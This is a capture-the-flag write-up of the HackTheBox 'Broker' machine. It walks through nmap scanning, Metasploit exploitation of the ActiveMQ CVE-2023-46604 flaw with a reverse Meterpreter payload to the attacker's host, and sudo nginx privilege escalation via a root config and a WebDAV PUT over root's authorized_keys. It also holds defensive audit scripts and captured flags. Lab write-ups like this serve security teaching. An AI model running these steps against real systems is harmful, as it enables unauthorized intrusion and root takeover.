Contents
Connect to the HTB server and start the target machine
1.Which open TCP port is running the ActiveMQ service?
Scan the target's open ports with nmap (full TCP range)
Run nmap script and service/version detection against the open ports
2.What is the version of the ActiveMQ service running on the box?
3.What is the 2023 CVE-ID for a remote code execution vulnerability in the ActiveMQ version running on Broker?
4.What user is the ActiveMQ service running as on Broker?
Attempt exploitation
5.Submit the flag located in the activemq user's home directory.
USER_FLAG:3aab16740303a25ccc63b7f6c91623f8
6.What is the full path of the binary that the activemq user can run as any other user with sudo?
Drop from Meterpreter back into a shell
7.Which nginx directive can be used to define allowed WebDAV methods?
8.Which HTTP method is used to write files via the WebDAV protocol?
9.Which flag is used to set a custom nginx configuration by specifying a file?
10.Submit the flag located in the root user's home directory.
ROOT_FLAG:16de0aa36d6c7c4c7e55ea6fa167987a
Get a shell through the root-privileged nginx server
Generate a key pair with ssh-keygen on the target (or locally on the attack box)
Store the contents of root_ssh.pub in a variable
Connect to the HTB server and start the target machine
Target IP: 10.10.11.243
Assigned (attacker) IP: 10.10.16.6
1.Which open TCP port is running the ActiveMQ service?
Scan the target's open ports with nmap (full TCP range)
nmap -p- --min-rate=1500 -T4 {TARGET_IP} -oN nmap_result
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T4 10.10.11.243 -oN nmap_result
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 07:59 EDT
Nmap scan report for 10.10.11.243
Host is up (0.084s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open patrol-snmp
42143/tcp open unknown
61613/tcp open unknown
61614/tcp open unknown
61616/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 38.09 seconds
Run nmap script and service/version detection against the open ports (the port list is built from the first scan's output)
nmap -p`cat nmap_result | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sCV {TARGET_IP}
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p`cat nmap_result | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sCV 10.10.11.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-20 08:03 EDT
Nmap scan report for 10.10.11.243
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
| mqtt-subscribe:
| Topics and their most recent payloads:
| ActiveMQ/Advisory/Consumer/Topic/#:
|_ ActiveMQ/Advisory/MasterBroker:
5672/tcp open amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
8161/tcp open http Jetty 9.4.39.v20210325
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: Jetty(9.4.39.v20210325)
42143/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5672-TCP:V=7.94SVN%I=7%D=10/20%Time=6714F182%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\
SF:x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S
SF:\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x2
SF:0client\x20using\x20unsupported\x20AMQP\x20attempted")%r(HTTPOptions,89
SF:,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04
SF:\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0
SF:M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\x20usin
SF:g\x20unsupported\x20AMQP\x20attempted")%r(RTSPRequest,89,"AMQP\x03\x01\
SF:0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\
SF:0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11am
SF:qp:decode-error\xa17Connection\x20from\x20client\x20using\x20unsupporte
SF:d\x20AMQP\x20attempted")%r(RPCCheck,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\
SF:0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0
SF:`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa
SF:17Connection\x20from\x20client\x20using\x20unsupported\x20AMQP\x20attem
SF:pted")%r(DNSVersionBindReqTCP,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\
SF:x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\
SF:0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Conn
SF:ection\x20from\x20client\x20using\x20unsupported\x20AMQP\x20attempted")
SF:%r(DNSStatusRequestTCP,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02
SF:\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0
SF:S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\
SF:x20from\x20client\x20using\x20unsupported\x20AMQP\x20attempted")%r(SSLS
SF:essionReq,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10
SF:\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x0
SF:1\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20cl
SF:ient\x20using\x20unsupported\x20AMQP\x20attempted")%r(TerminalServerCoo
SF:kie,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x
SF:0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x
SF:1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\x
SF:20using\x20unsupported\x20AMQP\x20attempted");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61613-TCP:V=7.94SVN%I=7%D=10/20%Time=6714F17D%P=x86_64-pc-linux-gnu
SF:%r(HELP4STOMP,27F,"ERROR\ncontent-type:text/plain\nmessage:Unknown\x20S
SF:TOMP\x20action:\x20HELP\n\norg\.apache\.activemq\.transport\.stomp\.Pro
SF:tocolException:\x20Unknown\x20STOMP\x20action:\x20HELP\n\tat\x20org\.ap
SF:ache\.activemq\.transport\.stomp\.ProtocolConverter\.onStompCommand\(Pr
SF:otocolConverter\.java:258\)\n\tat\x20org\.apache\.activemq\.transport\.
SF:stomp\.StompTransportFilter\.onCommand\(StompTransportFilter\.java:85\)
SF:\n\tat\x20org\.apache\.activemq\.transport\.TransportSupport\.doConsume
SF:\(TransportSupport\.java:83\)\n\tat\x20org\.apache\.activemq\.transport
SF:\.tcp\.TcpTransport\.doRun\(TcpTransport\.java:233\)\n\tat\x20org\.apac
SF:he\.activemq\.transport\.tcp\.TcpTransport\.run\(TcpTransport\.java:215
SF:\)\n\tat\x20java\.lang\.Thread\.run\(Thread\.java:750\)\n\0\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port61616-TCP:V=7.94SVN%I=7%D=10/20%Time=6714F17D%P=x86_64-pc-linux-gnu
SF:%r(NULL,140,"\0\0\x01<\x01ActiveMQ\0\0\0\x0c\x01\0\0\x01\*\0\0\0\x0c\0\
SF:x11TcpNoDelayEnabled\x01\x01\0\x12SizePrefixDisabled\x01\0\0\tCacheSize
SF:\x05\0\0\x04\0\0\x0cProviderName\t\0\x08ActiveMQ\0\x11StackTraceEnabled
SF:\x01\x01\0\x0fPlatformDetails\t\0\x04Java\0\x0cCacheEnabled\x01\x01\0\x
SF:14TightEncodingEnabled\x01\x01\0\x0cMaxFrameSize\x06\0\0\0\0\x06@\0\0\0
SF:\x15MaxInactivityDuration\x06\0\0\0\0\0\0u0\0\x20MaxInactivityDurationI
SF:nitalDelay\x06\0\0\0\0\0\0'\x10\0\x0fProviderVersion\t\0\x075\.15\.15");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.82 seconds
The scan shows the ActiveMQ broker itself on port 61616 (the OpenWire transport). The other ports belong to the same product: 8161 is the Jetty web console behind basic auth (realm ActiveMQRealm, also proxied by nginx on 80), 61613 is STOMP, 61614 the WebSocket transport, 1883 MQTT and 5672 AMQP.
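The following helper is an added example, not from the original write-up: it builds the `-p` port list from an `nmap -oN` report, using a constructed report laid out like the scan above (with one state changed to `filtered` to show it is skipped), instead of the `cat | grep | cut | tr | sed` chain.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): derive the comma-separated
# port list that `nmap -p` expects from a normal-format (-oN) report. Unlike the
# cat|grep|cut|tr|sed chain used above, it keeps only ports whose state is
# "open" and never emits a trailing comma.

open_ports() {   # usage: open_ports <nmap -oN report>   -> e.g. 22,80,61616
    awk -F/ '
        $1 ~ /^[0-9]+$/ && $2 ~ /^tcp[[:space:]]+open([[:space:]]|$)/ {
            printf "%s%s", sep, $1
            sep = ","
        }
        END { if (sep != "") printf "\n" }
    ' "$1"
}

# Constructed report in the layout of the scan above; 5672 is set to "filtered"
# to show that non-open entries are dropped.
REPORT=$(mktemp)
trap 'rm -f "$REPORT"' EXIT
cat > "$REPORT" <<'EOF'
Nmap scan report for 10.10.11.243
Host is up (0.084s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
1883/tcp  open     mqtt
5672/tcp  filtered amqp
8161/tcp  open     patrol-snmp
61616/tcp open     unknown
Nmap done: 1 IP address (1 host up) scanned in 38.09 seconds
EOF

ports=$(open_ports "$REPORT")           # 22,80,1883,8161,61616
echo "nmap -p$ports -sCV 10.10.11.243"  # the service scan to run next
```

Point it at the real `nmap_result` file to get the same list the pipeline above produces; the awk match on the STATE column is what stops a `filtered` entry from sneaking into the second scan.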
2.What is the version of the ActiveMQ service running on the box?
The nmap output above already shows the ActiveMQ version: 5.15.15, carried as ProviderVersion in the OpenWire WireFormatInfo frame on port 61616.
Alternatively, connect to port 61616 directly (a browser or curl against http://{TARGET_IP}:61616 will do). OpenWire is not HTTP, but the broker sends its WireFormatInfo frame to every new connection, and the ProviderVersion string 5.15.15 is readable inside that binary blob.
3.What is the 2023 CVE-ID for a remote code execution vulnerability in the ActiveMQ version running on Broker?
Search vuldb for CVEs affecting this product and version
Scrolling down shows that ActiveMQ 5.15.15 is affected by CVE-2023-46604 (fixed in 5.15.16, 5.16.7, 5.17.6 and 5.18.3)
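As an added example that is not part of the original write-up or of any Apache tooling, the following script extracts ProviderVersion from a raw OpenWire banner (a constructed fragment laid out like the nmap fingerprint above) and checks it against the release lines that fixed CVE-2023-46604:

```shell
#!/usr/bin/env bash
# Added example; not from the original write-up or from Apache ActiveMQ tooling.
# 1) openwire_version: pull ProviderVersion out of the raw WireFormatInfo frame a
#    broker sends on connect (the frame nmap fingerprinted on 61616 above).
# 2) activemq_cve_2023_46604_affected: compare that version with the releases
#    that fixed CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6, 5.18.3 per the Apache
#    advisory). Every older release in those branches and every pre-5.15 release
#    is affected; 6.x shipped with the fix.

# Constructed banner fragment: each field is "<len>Name", then a type byte
# (0x09 = string), a 2-byte length and the value, as in the fingerprint above.
sample_banner() {
    printf 'ActiveMQ\000\014ProviderName\011\000\010ActiveMQ\000\017ProviderVersion\011\000\007%s' '5.15.15'
}

openwire_version() {   # usage: openwire_version < raw-banner ; prints e.g. 5.15.15
    # turn every byte outside [A-Za-z0-9.] (NUL, length and type bytes) into a
    # newline, then take the token that follows "ProviderVersion"
    tr -cs '[:alnum:].' '\n' | grep -A1 -x ProviderVersion | tail -n 1
}

activemq_cve_2023_46604_affected() {   # usage: <version> ; exit 0 = affected, 1 = fixed
    local v=$1 major minor patch fixed rest
    case $v in [0-9]*.[0-9]*) ;; *) echo "bad version string: $v" >&2; return 2 ;; esac
    major=${v%%.*}
    rest=${v#*.}
    minor=${rest%%.*}
    case $rest in *.*) patch=${rest#*.} ;; *) patch=0 ;; esac
    patch=${patch%%[!0-9]*}            # strip suffixes such as "-SNAPSHOT"
    case "$major.$minor" in
        5.15) fixed=16 ;;
        5.16) fixed=7 ;;
        5.17) fixed=6 ;;
        5.18) fixed=3 ;;
        *)  # no fixed release exists for branches before 5.15; later branches are fixed
            if [ "$major" -lt 5 ] || { [ "$major" -eq 5 ] && [ "$minor" -lt 15 ]; }; then
                return 0
            fi
            return 1 ;;
    esac
    if [ "${patch:-0}" -lt "$fixed" ]; then
        return 0
    fi
    return 1
}

ver=$(sample_banner | openwire_version)
if activemq_cve_2023_46604_affected "$ver"; then
    echo "ActiveMQ $ver: affected by CVE-2023-46604"
else
    echo "ActiveMQ $ver: not affected by CVE-2023-46604"
fi
```

Against a live broker, feed the real frame in instead of the sample, for instance `nc -w 3 {TARGET_IP} 61616 </dev/null | openwire_version` with OpenBSD netcat (other netcat builds need a different idle-timeout flag); no data is sent to the broker, so this is as quiet as the nmap NULL probe.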
4.What user is the ActiveMQ service running as on Broker?
Looking the CVE up on CNNVD shows it gives direct remote code execution (a shell): the OpenWire transport unmarshals an ExceptionResponse whose class name and String argument both come from the client, so an unauthenticated sender can instantiate any classpath class that has a single-String constructor. The public exploits use Spring's ClassPathXmlApplicationContext, which loads an attacker-hosted XML bean definition that runs a command; the "Sent ClassPathXmlApplicationContext configuration file" line in the Metasploit output below is exactly that step.
Start Metasploit
msfconsole
Search for the CVE ID
msf6 > search CVE-2023-46604
Select the exploit module
msf6 > use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
List the module's options
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options
Attempt exploitation
The options to set for this module are LHOST, LPORT, RHOSTS, SRVHOST and PAYLOAD. LHOST/LPORT are the reverse handler; SRVHOST (with the default SRVPORT 8080) is where the module serves the Spring XML that the broker fetches, so the target must be able to reach that address (it shows up in the "Using URL" line of the output).
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set LHOST 10.10.16.6
LHOST => 10.10.16.6
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set lport 1425
lport => 1425
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set RHOSTS 10.10.11.243
RHOSTS => 10.10.11.243
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set SRVHOST 10.10.16.6
SRVHOST => 10.10.16.6
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_http
PAYLOAD => cmd/linux/http/x64/meterpreter_reverse_http
Type run or exploit to launch the module
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Started HTTP reverse handler on http://10.10.16.6:1425
[*] 10.10.11.243:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 10.10.11.243:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.15
[*] 10.10.11.243:61616 - Using URL: http://10.10.16.6:8080/8PbbHPQ2yq
[*] 10.10.11.243:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 10.10.11.243:61616 - Sent ClassPathXmlApplicationContext configuration file.
[!] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Redirecting stageless connection from /MSMT6wDicVqtE6sRygarOA3kv-N8oKle3FHjO_jRYeNTUck2edy26hRu432A97PjamyCMabbOBwnUZ6MJq6wGCXD8jIrBQ-C62VXNxbIFGoaPg with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'
[!] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Attaching orphaned/stageless session...
[!] http://10.10.16.6:1425 handling request from 10.10.11.243; (UUID: zz3u79fg) Without a database connected that payload UUID tracking will not work!
[*] 10.10.11.243:61616 - Server stopped.
[*] Meterpreter session 1 opened (10.10.16.6:1425 -> 10.10.11.243:56034) at 2024-10-20 09:31:29 -0400
meterpreter > ps
Process List
============
PID PPID Name Arch User Path
--- ---- ---- ---- ---- ----
946 1 java x86_64 activemq /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java
1460 1 BnrCpBMJa x86_64 activemq /opt/apache-activemq-5.15.15/bin/BnrCpBMJa
Both processes run as activemq: the java process is the broker, and the randomly named binary under its bin directory is the payload the module dropped into the broker's working directory (delete it during cleanup). Drop from Meterpreter into a shell
meterpreter > shell
Check the current user
whoami
meterpreter > shell
Process 1483 created.
Channel 2 created.
whoami
activemq
The output confirms that the ActiveMQ service runs as the activemq user.
5.Submit the flag located in the activemq user's home directory.
Locate user_flag
find / -name 'user.txt' 2>/dev/null
Read user_flag
cat /home/activemq/user.txt
find / -name 'user.txt' 2>/dev/null
/home/activemq/user.txt
cat /home/activemq/user.txt
3aab16740303a25ccc63b7f6c91623f8
USER_FLAG:3aab16740303a25ccc63b7f6c91623f8
6.What is the full path of the binary that the activemq user can run as any other user with sudo?
Exit the shell back to Meterpreter
exit
Try Meterpreter's one-shot privilege escalation
meterpreter > getsystem
[-] The "getsystem" command requires the "priv" extension to be loaded (run: `load priv`)
It says the priv extension must be loaded first
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: The "priv" extension is not supported by this Meterpreter type (x64/linux)
[-] The "priv" extension is supported by the following Meterpreter payloads:
[-] - windows/x64/meterpreter*
[-] - windows/meterpreter*
Only the Windows payloads support getsystem; this is a Linux target, so privilege escalation has to be done by hand.
Drop from Meterpreter back into a shell
meterpreter > shell
Upgrade to a TTY shell
script -c /bin/bash -q /dev/null
List the commands the current user may run with sudo
activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
The output shows that activemq may run the binary /usr/sbin/nginx via sudo as any user and group (ALL : ALL) without a password. Because nginx accepts an arbitrary configuration file (-c), and that file decides which user the workers run as, which directory is served and whether WebDAV writes are allowed, this rule is equivalent to root. The fix is to drop the rule or pin it to an exact argument list such as /usr/sbin/nginx -s reload, which sudoers matches literally.
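The following audit helper is an added example, not from the original write-up: it parses `sudo -l` output (a constructed sample modelled on the output above, plus two extra rules) and prints the NOPASSWD commands whose binary is known to load an arbitrary config or spawn a shell. The binary list is an assumption and illustrative only.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: audit `sudo -l` output for
# passwordless rules on binaries that will load an arbitrary configuration file
# or hand out a shell. nginx qualifies because `sudo nginx -c <file>` runs any
# config as root, including `user root;` and `dav_methods PUT;` (which is how
# this box falls). The binary list is illustrative, not exhaustive.

RISKY_BINS="nginx apache2 httpd vim vi nano less more find python python3 perl bash sh env"

sudo_l_risky() {   # usage: sudo_l_risky < output-of-sudo-l ; prints one risky NOPASSWD command per line
    awk -v risky="$RISKY_BINS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /^[[:space:]]*\(/ {                 # rule lines look like "(user : group) [NOPASSWD:] cmd, cmd"
            if ($0 !~ /NOPASSWD:/) next     # a password prompt blocks the unauthenticated path
            line = $0
            sub(/^.*NOPASSWD:[[:space:]]*/, "", line)
            m = split(line, cmds, ",[[:space:]]*")
            for (i = 1; i <= m; i++) {
                cmd = cmds[i]; sub(/[[:space:]]+$/, "", cmd)
                base = cmd
                sub(/[[:space:]].*/, "", base)   # drop arguments
                sub(/.*\//, "", base)            # drop the directory
                if (base in bad) print cmd
            }
        }'
}

# Constructed sample modelled on the sudo -l output above, plus two extra rules
# (one harmless, one that requires a password) to show what is filtered out.
SAMPLE_SUDO_L='Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
    (root) NOPASSWD: /usr/bin/systemctl restart activemq, /usr/bin/vim /etc/hosts
    (ALL) /usr/bin/apt update'

printf '%s\n' "$SAMPLE_SUDO_L" | sudo_l_risky
```

Run it as `sudo -l | sudo_l_risky` on a foothold, or over collected `sudo -l` output during an audit; for this box it prints /usr/sbin/nginx, and for the sample it also prints the vim rule while ignoring systemctl and the password-protected apt rule.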
7.Which nginx directive can be used to define allowed WebDAV methods?
Fed this question straight to Doubao (an AI assistant)
From the answer: in nginx, the dav_methods directive defines which WebDAV methods are allowed
dav_methods belongs to ngx_http_dav_module, which is only available when nginx was built with --with-http_dav_module (nginx -V lists the build options).
WebDAV (Web Distributed Authoring and Versioning) extends HTTP with remote file-management operations such as creating, deleting, copying and moving files.
The directive takes the methods to enable, any combination of PUT, DELETE, MKCOL, COPY and MOVE, and is valid in the http, server and location contexts, so it controls what WebDAV requests may do under a given path. Its default is dav_methods off; nothing is writable unless it is set explicitly.
For example, "dav_methods PUT DELETE;" allows only PUT and DELETE in that context.
8.Which HTTP method is used to write files via the WebDAV protocol?
Same again, straight to Doubao
At this point the escalation path is obvious: run nginx with a config whose document root is the directory holding root_flag
Later, WebDAV PUT can also be used to write files and turn that into a stable root shell
WebDAV (Web Distributed Authoring and Versioning) is an extension of HTTP that lets clients manage files on a server over HTTP much as on a local filesystem: creating, deleting, moving and copying files and folders, editing their properties, and collaborative editing with version tracking. It adds new methods and headers on top of HTTP: PUT uploads (writes) a file, DELETE removes one, MKCOL creates a collection (directory), COPY and MOVE do what their names say, and property information such as size and timestamps is exchanged through PROPFIND/PROPPATCH. Typical uses are internal file shares, content-management systems that let editors update a site remotely, and mobile-device sync of contacts, calendars and documents. The answer to the question is therefore PUT.
9.Which flag is used to set a custom nginx configuration by specifying a file?
Check nginx's help
activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo /usr/sbin/nginx -h
nginx version: nginx/1.18.0 (Ubuntu)
Usage: nginx [-?hvVtTq] [-s signal] [-c filename] [-p prefix] [-g directives]

Options:
-?,-h : this help
-v : show version and exit
-V : show version and configure options then exit
-t : test configuration and exit
-T : test configuration, dump it and exit
-q : suppress non-error messages during configuration testing
-s signal : send signal to a master process: stop, quit, reopen, reload
-p prefix : set prefix path (default: /usr/share/nginx/)
-c filename : set configuration file (default: /etc/nginx/nginx.conf)
-g directives : set global directives out of configuration file
The output shows that -c is the flag that sets the configuration file. -t is worth noting too: sudo /usr/sbin/nginx -t -c <file> validates a config as root before an instance is started with it.
10.Submit the flag located in the root user's home directory.
Find the root directory under / on the target
activemq@broker:/opt/apache-activemq-5.15.15/bin$ cd /
activemq@broker:/$ ls
bin dev home lib32 libx32 media opt root sbin sys usr
boot etc lib lib64 lost+found mnt proc run srv tmp var
activemq@broker:/$ cd root
bash: cd: root: Permission denied
An nginx conf template is easy to find online; set the document root to /root. Two details matter: sudo starts the nginx master as root, but the worker processes that actually read files switch to the account named by the user directive, so "user root;" is what makes /root readable; and the events block is mandatory even though only worker_connections is set. This second instance runs beside the system nginx because it binds a different port, but it reuses the compiled-in default pid file unless a separate pid directive is given.
user root;
events {
worker_connections 666;
}
http {
server {
listen 6666;
root /root;
autoindex on;
}
}
Start an HTTP server locally and fetch the conf onto the target
python -m http.server 7777
wget http://{NATIVE_IP}:{NATIVE_PORT}/temp.conf -O temp.conf
Start nginx with the uploaded config
activemq@broker:/opt/apache-activemq-5.15.15/bin$ sudo /usr/sbin/nginx -c /opt/apache-activemq-5.15.15/bin/temp.conf
Check the listening sockets: port 6666 is now listening
activemq@broker:/opt/apache-activemq-5.15.15/bin$ ss -tlpn
From the attack box, fetch /root/root.txt directly
curl -v http://10.10.11.243:6666/root.txt
┌──(kali㉿kali)-[~]
└─$ curl -v http://10.10.11.243:6666/root.txt
* Trying 10.10.11.243:6666...
* Connected to 10.10.11.243 (10.10.11.243) port 6666
* using HTTP/1.x
> GET /root.txt HTTP/1.1
> Host: 10.10.11.243:6666
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sun, 20 Oct 2024 14:45:28 GMT
< Content-Type: text/plain
< Content-Length: 33
< Last-Modified: Sun, 20 Oct 2024 11:21:25 GMT
< Connection: keep-alive
< ETag: "6714e7b5-21"
< Accept-Ranges: bytes
<
16de0aa36d6c7c4c7e55ea6fa167987a
* Connection #0 to host 10.10.11.243 left intact
ROOT_FLAG:16de0aa36d6c7c4c7e55ea6fa167987a
Get a shell through the root-privileged nginx server
Modify the conf to allow WebDAV PUT uploads. Note the changed listen port, and that the document root is now / so that a URL path maps to the same absolute filesystem path. dav_methods requires ngx_http_dav_module; nginx -V shows whether it was compiled in (Ubuntu's package includes it, as the successful PUT below confirms).
user root;
events {
worker_connections 666;
}
http {
server {
listen 3333;
root /;
autoindex on;
dav_methods PUT;
}
}
Upload the conf to the target again and start nginx with it (sudo /usr/sbin/nginx -c <path to the new conf>)
Checking the listening sockets again: ports 3333 and 6666 are both listening
Generate a key pair with ssh-keygen on the target (or locally on the attack box)
activemq@broker:/tmp$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/activemq/.ssh/id_rsa): ./root_ssh
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./root_ssh
Your public key has been saved in ./root_ssh.pub
The key fingerprint is:
SHA256:mxcbrkJlvwTbX2D+gjTAdXjZlDvaIIBTizxw/L90KYs activemq@broker
The key's randomart image is:
+---[RSA 3072]----+
| ...o. . +.. |
| ++...o + o |
| ++.o o . |
| .B . + o |
| oSBo+ * . |
| . .+X+= o |
| . o=+X o |
| . Eo= o . |
| .. . |
+----[SHA256]-----+
activemq@broker:/tmp$ ls
root_ssh root_ssh.pub
The root user's authorized_keys lives at /root/.ssh/authorized_keys by default
Use nginx's PUT to overwrite /root/.ssh/authorized_keys with root_ssh.pub
In SSH, authorized_keys sits in the target user's .ssh directory and lists the public keys allowed to log in as that user, one per line in the form "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCy... comment" (optional restrictions such as command= or from= may precede the key type).
When a client offers a key, sshd looks for its public half in that file and, if found, lets the client in without a password. Managing this file controls who may reach an account over SSH and enables passwordless logins and automation, which is also why an arbitrary file write as root is enough to own the box.
